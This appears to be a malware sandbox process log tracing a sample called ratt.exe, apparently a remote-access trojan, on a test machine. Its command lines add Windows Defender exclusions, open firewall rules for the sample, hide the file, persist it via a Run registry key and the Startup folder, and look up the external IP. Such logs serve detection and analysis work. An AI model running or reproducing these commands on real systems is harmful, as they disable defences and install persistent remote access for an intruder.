nslookup.exe nslookup myip.opendns.com. resolver1.opendns.com
2804WMIC.exe wmic ComputerSystem get Domain
2908powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
3032powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\test22\AppData\Local\Temp\"'
908powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'
1336powershell.exe Powershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'
2272powershell.exe Powershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\test22\AppData\Local\Temp\ratt.exe"'
25487z.exe 7z.exe x -o"C:\Users\test22\AppData\Local\Temp" -y ratt.7z
2644netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
2960netsh.exe "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes
1152WMIC.exe wmic computersystem where name="TEST22-PC" set AutomaticManagedPagefile=False
2216WMIC.exe wmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=20000
2572ratt.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
2616attrib.exe "C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"
544reg.exe REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F
1096ratt.exe "ratt.exe"
2756